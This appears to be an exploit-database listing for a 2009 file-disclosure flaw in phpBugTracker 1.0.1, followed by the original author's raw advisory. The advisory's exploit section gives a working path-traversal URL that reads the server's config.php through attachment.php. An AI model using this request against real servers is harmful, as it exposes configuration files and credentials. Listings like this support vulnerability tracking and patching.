header-logo
Suggest Exploit
vendor:
phpBugTracker
by:
ViRuSMaN
7,5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: phpBugTracker
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpbt:phpbt:1.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpBugTracker v1.0.1 File Disclosure Vulnerability

A vulnerability exists in phpBugTracker v1.0.1 which allows an attacker to view sensitive files on the server. By sending a specially crafted HTTP request to the attachment.php script, an attacker can view the contents of any file on the server.

Mitigation:

Upgrade to the latest version of phpBugTracker.
Source

Exploit-DB raw data:

==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] phpBugTracker v1.0.1 File Disclosure Vulnerability
==============================================================================

    [»] Script:             [ phpBugTracker ]
    [»] Language:           [ PHP ]
    [»] Download:           [ http://ftp5.ru.freebsd.org/pub/FreeBSD/distfiles/phpbt-1.0.1.tar.gz ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Pentestlabs.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://server/[path]/attachment.php?filename=./config.php




Author: ViRuSMaN <-

###########################################################################